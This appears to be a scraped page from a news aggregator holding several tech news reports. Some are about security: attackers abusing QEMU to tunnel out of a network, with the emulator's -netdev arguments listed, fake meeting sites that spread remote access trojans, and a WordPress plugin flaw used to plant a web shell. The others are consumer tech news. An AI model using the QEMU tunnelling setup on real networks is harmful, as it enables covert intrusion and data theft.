Hackers Abuse QEMU Hardware Emulator to Covertly Exfiltrate Stolen Data

andreasc
-
0
Hackers Abuse QEMU Hardware Emulator to Covertly Exfiltrate Stolen Data
[ad_1]

QEMU is an open-source platform that provides a secure and private virtualized space for trying out malicious codes, exploits, and attacks on their own environments. 

⁤This controlled testing ground minimizes the risk of detection and legal matters. ⁤⁤

Moreover, QEMU permits hackers to develop malware that can run across different hardware architectures and operating systems.

Cybersecurity researchers at Kaspersky Labs recently discovered that hackers are abusing the QEMU hardware emulator to exfiltrate stolen data covertly.

QEMU Hardware Emulator

Attackers love using genuine tools in order to avoid detection but also to reduce malware expenditure. 

Data exfiltration, drive encryption, remote execution, and memory dumping are some of the network scanning activities that trusted software supports.

Pre-installed malware or employee-mimicking RDP/VPN access acts as footholds through compromised systems. 

Network tunnels and port forwarding utilities enable users to bypass NAT and firewalls, thus gaining entry into the internal system.

Numerous tools exist for creating network tunnels between systems, some direct, others using proxies to mask attacker IPs.

These utilities frequently surfaced during researchers’ incident response efforts over the past three years.

Here below we have mentioned the tools:-

  • Stowaway
  • ligolo
  • 3proxy
  • dog-tunnel
  • chisel
  • FRP
  • ngrok
  • gs-netcat
  • plink
  • iox
  • nps

Experts uncovered suspicious activity in a company’s system during a recent investigation. Among the tools detected were Angry IP Scanner, mimikatz, and QEMU. 

The presence of QEMU puzzled security analysts – why would attackers use a virtualizer? Further analysis revealed an unusual QEMU execution command line without a LiveCD or disk image.

Here below we have mentioned all the arguments:-

  • m 1M: Allocated only 1MB RAM, which is insufficient for most OSes.
  • netdev user,id=lan,restrict=off: Created virtual network interface ‘lan’ to communicate externally, without restrictions.
  • netdev socket,id=sock,connect=<IP>:443: Socket interface ‘sock’ connected to remote server at <IP>:443.
  • netdev hubport,id=port-lan/port-sock,hubid=0,netdev=lan/sock: Added ports to virtual hub linked to ‘lan’ and ‘sock’ interfaces.
  • nographic: Started QEMU in non-GUI console mode.

The external <IP> raised suspicions, and QEMU allows VM interconnections via -netdev options by creating network backends.

Network tunnel (Source – Securelist)

Experts used QEMU to build a Kali Linux VM on AttackerServer. The VM was connected through a socket adapter and listened on port 443.

PivotHost had another QEMU instance that connected to the socket over AttackerServer’s port 443.

The user adapter was conjoined via the hub with the socket. The adversary’s QEMU options were imitated.

QEMU set up a PivotHost-AttackerServer tunnel to enable subnet scans from PivotHost to the Kali VM.

QEMU does not encrypt tunneled traffic, as it sends unencrypted encapsulated packets. The packet data contains the Ethernet frame size and frame.

Removing headers can obtain intercepted traffic. However, threat actors also use legitimate tools ingeniously.

Multi-level protection with endpoint and network monitoring by SOC experts is crucial for timely rarity detection and attack blocking. While the MDR service can detect suspicious QEMU activity.

You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are incredibly harmful, can wreak havoc, and damage your network.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter


[ad_2]
Source link

‘Ultra’ flagship from Vivo to arrive later than expected

andreasc
-
0
‘Ultra’ flagship from Vivo to arrive later than expected
[ad_1]

Vivo is planning to announce its ‘Ultra’ flagship this year, but it will arrive a bit later than expected. Well, that’s at least according to a new report that surfaced. The device in question is the Vivo X100 Ultra, and it’s said to launch in May.

An ‘Ultra’ flagship from Vivo is coming later than expected

Reports until now indicated that the phone will launch in April, in China. Now, one of China’s best-known tipsters, Digital Chat Station, says that the phone has been delayed to May. He did not share an exact launch date, however.

The Vivo X100 and Vivo X100 Pro arrived in mid-November. The ‘Pro’ model is already a true flagship, so the changes that Vivo can make with the ‘Ultra’ are quite limited. The company does plan to offer an upgraded camera setup, based on rumors, though.

The phone is expected to include the Snapdragon 8 Gen 3 processor, unlike its ‘Pro’ sibling. The Vivo X100 Pro comes with the MediaTek Dimensity 9300 chip. The device will likely offer plenty of RAM and storage, and Vivo will utilize LPDDR5X RAM and UFS 4.0 flash storage.

The device will include 100W charging, and an even better camera setup than the ‘Pro’ model

Samsung’s E7 AMOLED display is expected here, a QHD+ panel. That will likely be a 6.7 or a 6.8-inch display, and chances are it will be curved. A 5,000mAh battery was also mentioned in rumors, and the same goes for 100W wired and 50W wireless charging. The phone will include a charger too, by the way.

Now, in regards to the cameras. A quad camera setup is expected with four 50-megapixel units. For comparison’s sake, the Vivo X100 Pro includes three 50-megapixel cameras on the back.

The main camera on the phone is said to be the Sony LYT-900 unit. That is the same camera the OPPO Find X7 Ultra is using for its main shooter. We’re also expecting to see two periscope telephoto cameras and an ultrawide unit on the back.


[ad_2]
Source link

Microsoft discontinues support for running Android apps on Windows 11

andreasc
-
0
Microsoft discontinues support for running Android apps on Windows 11
[ad_1]

Although it’s been talking about Windows Subsystem for Android for years, Microsoft has decided to shelve the feature that allows Windows 11 users to run Android apps on their PCs.

Instead of adding support for more platforms, Microsoft’s Windows Subsystem for Android was limited to apps that are available in the Amazon Appstore. Early this week, Microsoft confirmed that the Windows Subsystem for Android feature that it promised to improve will be actually discontinued.

According to Microsoft, starting March 5, 2025, the Amazon Appstore on Windows and all applications and games dependent on Windows Subsystem for Android will no longer be supported.

However, the Redmond-based company revealed that those who have installed the Amazon Appstore or Android apps prior to March 5, 2024, will continue to have access to those apps through the deprecation date of March 5, 2025.

Microsoft is ending support for the Windows Subsystem for Android️ (WSA). As a result, the Amazon Appstore on Windows and all applications and games dependent on WSA will no longer be supported beginning March 5, 2025. Until then, technical support will remain available to customers. Customers that have installed the Amazon Appstore or Android apps prior to March 5, 2024, will continue to have access to those apps through the deprecation date of March 5, 2025.

It’s unclear why Microsoft decided to discontinue support for running Android apps on Windows 11, but Phone Link has been the better option for those who wanted to do this for many years.

Time will tell if Microsoft will instead focus on making Phone Link even better than it is now that the alternative, Windows Subsystem for Android, is no more.


[ad_2]
Source link

Hackers use Zoom & Google Meet Lures to Attack Android & Windows

andreasc
-
0
Hackers use Zoom & Google Meet Lures to Attack Android & Windows
[ad_1]

A threat actor has been identified as creating fraudulent Skype, Google Meet, and Zoom websites to distribute malware, explicitly targeting Android and Windows users.

This article delves into the details of this malicious campaign and explains how users can identify and protect themselves from these threats.

Attack Sequence:

A threat actor distributes various malware families through fake Skype, Zoom, and Google Meet websites.

Remote Access Trojans (RATs) such as SpyNote RAT for Android, NjRAT and, DCRat for Windows are being distributed.

Document
Integrate ANY.RUN in your company for Effective Malware Analysis

Malware analysis can be fast and simple. Just let us show you the way to:

  • Interact with malware safely
  • Set up virtual machine in Linux and all Windows OS versions
  • Work in a team
  • Get detailed reports with maximum data
    • If you want to test all these features now with completely free access to the sandbox: ..

The attacker utilized shared web hosting with all fake sites hosted on a single IP address in Russia.

Malicious URLs closely resemble legitimate websites, making it challenging for users to differentiate.

Attack chain and execution flow for Android and Windows campaigns (source: Zscaler)
Attack chain and execution flow for Android and Windows campaigns (source: Zscaler)

The attacker’s modus operandi involves luring users to click on fake sites where clicking on the Android button initiates the download of a malicious APK file, while clicking on the Windows button triggers the download of a BAT file, leading to a RAT payload download.

Rest assured that Zscaler’s ThreatLabz team diligently monitors and shares expert insights on all potential threats to keep you and the wider community safe.

Skype:

The first fake site discovered was join-skype[.]info, designed to deceive users into downloading a fake Skype application.

The Windows button is directed to Skype8.exe and the Google Play button is pointed at Skype.apk.

The fraudulent Skype website, with a fake domain meant to resemble the legitimate Skype domain. (Source urlscan.io.)
The fraudulent Skype website, with a fake domain meant to resemble the legitimate Skype domain. (Source urlscan.io.)

Google Meet:

Another fake site, online-cloudmeeting[.]pro, mimicking Google Meet, was identified. The site provided links to download fake Skype applications for Android and Windows.

The Windows link led to a BAT file downloading DCRat, while the Android link led to a SpyNote RAT APK file.

The fake Google Meet page, showing the fraudulent domain in the address bar for a fake Google Meet Windows application link to a malicious BAT file that downloads and executes malware. (source: Zscaler)
The fake Google Meet page, showing the fraudulent domain in the address bar for a fake Google Meet Windows application links to a malicious BAT file that downloads and executes malware. (Source: Zscaler)

Zoom:

Later, a fake Zoom site, us06webzoomus[.]pro, emerged with links to download SpyNote RAT for Android and DCRat for Windows.

The site closely resembled a legitimate Zoom meeting ID.

The fake Zoom page, showing a domain similar to the real Zoom domain in the address bar and a link to the malicious APK file that contains SpyNote RAT when the Google Play button is clicked. (source: Zscaler)
The fake Zoom page shows a domain similar to the real Zoom domain in the address bar and a link to the malicious APK file that contains SpyNote RAT when the Google Play button is clicked. (Source: Zscaler

Open Directories:

The fake Google Meet and Zoom sites also contained additional malicious files like driver.exe and meet.exe (NjRAT), indicating potential future campaigns utilizing these files.

Example of additional malicious files hosted on the websites hosting fake online meeting applications. (Source: Zscaler)

Businesses are at risk of impersonation attacks through online meeting applications, leading to the distribution of RATs that can compromise sensitive data.

Vigilance, robust security measures, regular updates, and patches are crucial in safeguarding against evolving cyber threats. Proactive measures are essential as cyber threats evolve.

Zscaler’s ThreatLabz team remains dedicated to monitoring these threats and sharing insights with the community.

You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are incredibly harmful, can wreak havoc, and damage your network.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter


[ad_2]
Source link

It’ll be easier to know what Android Auto apps you can’t use while driving

andreasc
-
0
It’ll be easier to know what Android Auto apps you can’t use while driving
[ad_1]

Android Auto comes with a ton of apps you can use to help boost your smart car experience. However, some of the apps can be rather distracting, which is a car accident just waiting to happen. Luckily, the most distracting Android Auto apps can only be used when your car is parked. Thanks to a new update, it’ll be easier to know which apps these are.

A good example of a distracting app is called GameSnacks. This is a suite of games that you can play on your car’s dashboard. Obviously, you would not want to play these games while driving. That could lead to large casualties due to car accidents and large lawsuits against Google and the app developer. So, if you try to fire up GameSnacks while you are on the road, you will not be able to use it. This is a great safety feature, and it’s going to get better thanks to an update.

Android Auto will make it easier to know which apps you can only use while parked

When trying to figure out which apps you can only use while parked, most people have to find out the hard way. They have to start the app and get the notification. However, Google has come up with a simple way to let people know that you can’t use certain apps while driving.

On the app icon, you’ll see a little “P” symbol. This little “P” symbol symbolizes that you can’t use the app while driving. So, rather than starting the app, you simply have to look at the icon.

When it comes to navigating, there’s another Google feature that will help you out. Google Maps will show you building entrances. When you are on the map view, and you tap on the building, you will see arrows pointing to where the building’s entrance and exits are. This will help you navigate to buildings you are unfamiliar with and choose the right entrances. This feature is currently rolling out.


[ad_2]
Source link

Google TV adds free and free-with-ads Oscar-nominated films to get you ready for the Academy Awards

andreasc
-
0
Google TV adds free and free-with-ads Oscar-nominated films to get you ready for the Academy Awards
[ad_1]

The Oscars are just around the corner, and if you like to be up to date on the movies that are nominated for an Academy Award this year—so you can either agree or disagree with who takes away the prize in the end—then Google TV can be your guide. Google TV has updated their recommendations section to include an Oscar-nominated movies category that serves up new and old Oscar-nominated films that you can watch for free, free with ads, or with a subscription.Spotted by Android Authority, the category refresh includes all the Best Picture nominees from this year, making it easy for you to catch up on the contenders before the big night. In the mix, you can find Best Picture nominees like “Oppenheimer” and “Barbie,” as well as curated selections of films perfect for reliving the classics or celebrating Women’s History Month. These are the titles available through Google TV:
For free or with a subscription:
  • Oppenheimer
  • Killers of the Flower Moon
  • Barbie
  • Anatomy of a Fall
  • The Holdovers
  • Past Lives
  • The Zone of Interest
  • The Color Purple
  • The Creator
  • Napoleon
  • Golda
  • Guardians of the Galaxy Vol. 3
  • Mission: Impossible – Dead Reckoning
  • Elemental
  • Spider-Man: Across the Spider-Verse
  • Flamin’ Hot

Free, but with ads:
  • Knives Out
  • Monster’s Ball
  • Forrest Gump
  • The Hurt Locker
  • The Big Short
  • Boyhood
  • Hotel Rwanda
  • Sophie’s Choice
  • Mississippi Burning
  • Rain Man
  • Who’s Afraid of Virginia Woolf?
  • In the Heat of the Night
  • The Apartment
  • Babel
  • Dead Man Walking
  • Adaptation
  • Capote
  • Cold Mountain
  • The Maltese Falcon
  • The Reader
  • Requiem for a Dream
  • I’m Not There
  • A Streetcar Named Desire
  • Manhattan
  • Margin Call
  • Strangers on a Train
  • Barry Lyndon
  • The Third Man
  • Dances with Wolves
  • Pan’s Labyrinth
  • Stand and Deliver
  • Bullitt
  • North by Northwest
  • Amores perros
  • Doctor Zhivago

The Academy Awards (a.k.a. “The Oscars”) will be held this Sunday March 10th at 7pm Pacific Time and will be broadcast live on ABC, with a 30-minute pre-show that will lead into the award show. If you are a YouTube TV subscriber, you will be able to stream via the app, or if you have a cable subscription and prefer to stream, you can always do so using the ABC app as well.

[ad_2]
Source link

Hackers Exploit WordPress Plugin Flaw to Deploy Godzilla

andreasc
-
0
Hackers Exploit WordPress Plugin Flaw to Deploy Godzilla
[ad_1]

Hackers have been found exploiting a vulnerability in a WordPress Plugin 3DPrint Lite(CVE-2021-4436) to deploy the notorious Godzilla Web Shell.

This malicious activity significantly threatens website security and data integrity, prompting concerns among cybersecurity experts and website administrators worldwide.

Cybercriminals commonly exploit vulnerabilities in popular software, such as WordPress plugins, to gain unauthorized access to websites.

In this instance, the hackers have leveraged a flaw in a specific WordPress plugin to deploy the Godzilla Web Shell. This powerful tool allows them to execute arbitrary commands on compromised websites.

Implications for Website Security

The deployment of the Godzilla Web Shell signifies a grave security risk for websites running the vulnerable WordPress plugin.

Once installed, this web shell grants hackers remote access and control over the website, enabling them to steal sensitive data, deface web pages, or launch further cyber attacks.

Document
Integrate ANY.RUN in your company for Effective Malware Analysis

Malware analysis can be fast and simple. Just let us show you the way to:

  • Interact with malware safely
  • Set up virtual machine in Linux and all Windows OS versions
  • Work in a team
  • Get detailed reports with maximum data
    • If you want to test all these features now with completely free access to the sandbox: ..

Website owners are urged to take immediate action to secure their sites and mitigate the potential damage caused by this exploit.

According to Threat Brief, a vulnerability found in a WordPress plugin has led to the exploitation of the Godzilla web shell, resulting in the discovery of a new CVE.

Cybersecurity experts are actively monitoring the situation and working on developing countermeasures to address this emerging threat.

By analyzing detailed Threat Briefs like those produced regularly by security firms, including reports on ransomware variants like BlackSuit, BlackCat, and AlphV, industry professionals are enhancing their detection rulesets to identify and thwart such malicious activities proactively.

Strengthening Website Defenses

Website administrators are advised to stay informed about the latest security vulnerabilities and apply patches promptly to safeguard against similar cyber threats.

Regularly updating software, implementing robust access controls, and conducting security audits can help fortify defenses against potential exploits like the one targeting the WordPress plugin.

Exploiting a WordPress plugin flaw to deploy the Godzilla Web Shell underscores the critical need for proactive cybersecurity measures.

By staying vigilant, updating defenses, and leveraging insights from threat intelligence reports, website owners can better protect their online assets from malicious actors seeking to compromise their security.

You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are incredibly harmful, can wreak havoc, and damage your network.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter


[ad_2]
Source link

Tidal’s lossless plan now costs the same as a Spotify subscription

andreasc
-
0
Tidal’s lossless plan now costs the same as a Spotify subscription
[ad_1]

Amidst companies continually increasing subscription fees and reducing quality, Tidal has just decreased the cost of its lossless plan. The news comes via a post from the company itself on “upcoming changes” to its subscription plans. What’s truly a shocker is that the changes are making the subscriptions cheaper. Tidal has been a go-to for many audiophiles for its offering of lossless streaming. The new pricing makes Tidal a much more formidable competitor to Spotify.

What do Tidal’s new lossless plans cost?

Previously, Tidal’s HiFi subscription cost users $20 a month. This is almost double Spotify’s $10.99 fee. Tidal’s new fee is exactly the same as Spotify; $10.99. The company is merging all HiFi tiers into one, called the Tidal tier. Both services cost the same now, and the deciding factors now come down to the features offered by either.

Spotify has a lot going for it – like its amazing discovery feature and a bigger music library – but Tidal offers better sound. Audiophiles with expensive gear will almost always choose Tidal for its FLAC offerings. More casual listeners might not be swayed as much and may prefer Spotify’s excellent playlists. The music library is also vaster on Spotify which may be another reason to stick with it for now. Spotify has no lossless streaming options, despite the company promising it for years.

What is lossless audio?

Most music available for streaming or download is compressed. From 192 kbps bitrate for small file size to 320 kbps for a compromise on quality and size. Lossless audio, on the other hand, is a little over 1400 kbps. This is as good as audio can get in a digital format. It is completely uncompressed, raw audio. This is most often presented in the FLAC format.

Something worth keeping in mind is that not all gear can make use of lossless audio. Nor can many people hear the difference between 320 kbps and lossless music. However, if someone is passionate about audio and has good audio gear, Tidal’s lossless offering is definitely the way to go. Especially with the new price, Spotify now has tough competition and really needs to up its game.

When comparing music streaming services, people only choose between Tidal and Apple Music if lossless is a priority. Spotify’s slow adoption of lossless streaming is only hurting the company’s bottom line. Tidal says the new pricing will take effect from April 10. The individual plan is $10.99, and the family plan is now $16.99.


[ad_2]
Source link

ChatGPT can talk to you now

andreasc
-
0
ChatGPT can talk to you now
[ad_1]

So, you have ChatGPT generate a response for you, but it’s just too long to read. Well, with as detailed and meticulous ChatGPT can be with his answers, this is bound to happen from time to time. Well, fear not, as ChatGPT can now read your answers aloud.

OpenAI posted a video to its official X account, to announce this news. It’s first launching this feature to the iOS and Android versions of the app. It announced that it’s going to be rolling this out to the web version as well.

ChatGPT is getting a read-aloud feature

We see this in version 1.2024.052 of the Android app. In order to activate the Read Aloud feature, go to a conversation and hold your finger down on one of ChatGPT’s answers. You will see a little drop-down menu open up. The bottom option will be Read aloud.

When you tap on the option, you will see a little control panel appear at the top of the screen. This will show you the duration of the read-aloud session along with how much time has elapsed. Along with that, you’ll see four controls. The first control, which looks like a stop button with an arrow and circling it, will enable/disable the auto-read-back function. When enabled, the app will automatically read back your responses every time you ask ChatGPT something. It will only do this if the panel is still visible.

The next two buttons will jump forward 10 seconds and jump backward 10 seconds. Also, the last button will close the panel.

Using this feature on the web will be a little bit different. Rather than tapping and holding on a message, you will just roll your mouse over the message and click on the Read aloud button that appears under it. However, this feature is not currently available for the web version, so it’s coming soon.

If you don’t see this feature for your app, make sure that it is fully updated. Depending on your region, there’s a chance that you’ll need to wait a bit.


[ad_2]
Source link

Besides Facebook and Instragram, the Google Play Store also went down today

andreasc
-
0
Besides Facebook and Instragram, the Google Play Store also went down today
[ad_1]
Complaints about the Play Store being down came in from Android users in U.S. cities like Seattle to Android owners unable to search for any new apps in Southwest Brazil. One DownDetector subscriber wrote, “Play Store not searching for apps. Just keeps spinning and spinning. I guess it is playing with the spinning thing instead of doing its job at being a store.”
According to the Google Play Status Dashboard, an issue with the Play Integrity API started creating the issue at around 10:37 am ET and it ended at 11:40 am ET. The Play Integrity API helps app developers check to make sure that user actions and requests are coming from a legit Android user who has purchased or installed a developer’s app or game. It can also detect whether the Android user is using a tampered version of the developer’s app.
The Google Play Store went down Tuesday morning - Besides Facebook and Instragram, the Google Play Store also went down today

The Google Play Store went down Tuesday morning

By the way, you might find it interesting to install the DownDetector app on your iPhone or Android handset. Personally, when there have been times when I couldn’t reach my kids on the phone, I open the app to see whether my carrier is down. If there is no issue, well then, I know it’s time to worry.

You can install the app on your iPhone by tapping on this link which will take you to the App Store. If you have an Android device, and the Google Play Store is up and running, you can click on this link to install the Android version of the DownDetector app.

It seems that we’ve all survived a day with Facebook, Instagram, and the Play Store all going down in the morning. What will happen next?


[ad_2]
Source link
1...352353354...1,476Page 353 of 1,476